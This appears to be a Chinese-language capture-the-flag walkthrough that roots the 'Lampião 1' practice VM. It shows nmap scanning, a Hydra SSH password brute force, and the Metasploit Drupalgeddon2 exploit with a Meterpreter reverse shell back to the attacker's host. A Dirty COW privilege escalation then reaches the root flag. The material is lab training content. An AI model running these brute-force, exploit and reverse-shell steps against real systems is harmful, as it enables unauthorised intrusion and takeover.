Description Would you like to keep hacking in your own lab?
Try this brand new vulnerable machine! "Lampião 1".
Get root!
Level: Easy
信息搜集
获取项目地址
1
nmap -sP 10.0.0.0/24
返回
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[~/100project/002] └─# nmap -sP 10.0.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:54 CST Nmap scan report for openwrt.lan (10.0.0.1) Host is up (0.00048s latency). MAC Address: 00:15:5D:80:01:00 (Microsoft) Nmap scan report for PC-A.lan (10.0.0.2) Host is up (0.00030s latency). MAC Address: 00:15:5D:64:C0:00 (Microsoft) Nmap scan report for 02.lan (10.0.0.102) Host is up (0.00063s latency). MAC Address: 00:0C:29:D0:3D:FF (VMware) Nmap scan report for kali.lan (10.0.0.3) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds
确定项目ip为 10.0.0.102
扫描项目端口
namp -p- 10.0.0.102
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/100project/002] └─# nmap -p- 10.0.0.102 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:56 CST Nmap scan report for 02.lan (10.0.0.102) Host is up (0.0025s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1898/tcp open cymtec-port MAC Address: 00:0C:29:D0:3D:FF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.94 seconds
┌──(root㉿kali)-[~/100project/002] └─# hydra -l tiago -P passwd.txt -o success.txt 10.0.0.102 -s 22 ssh Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-02 15:11:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 844 login tries (l:1/p:844), ~53 tries per task [DATA] attacking ssh://10.0.0.102:22/ [22][ssh] host: 10.0.0.102 login: tiago password: Virgulino 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-02 15:12:35
---- Entering directory: http://10.0.0.102:1898/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/misc/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/modules/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/profiles/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/scripts/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/sites/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi ng-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.0.3 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts http://10.0.0.102:1898/ rhosts => http://10.0.0.102:1898/ msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Sending stage (39927 bytes) to 10.0.0.102 [*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.102:52034) at 2022-09-03 15:24:06 +0800
meterpreter > shell Process 5701 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@lampiao:/var/www/html$ cd /tmp cd /tmp www-data@lampiao:/tmp$
www-data@lampiao:/tmp$ ls ls 40847.cpp dcow les.sh www-data@lampiao:/tmp$ ./dcow ./dcow Running ... Received su prompt (Password: ) Root password is: dirtyCowFun Enjoy! :-) www-data@lampiao:/tmp$ su root su root Password: dirtyCowFun
root@lampiao:/tmp# cd /root cd /root root@lampiao:~# ls ls flag.txt root@lampiao:~# cat f cat flag.txt 9740616875908d91ddcdaa8aea3af366 root@lampiao:~#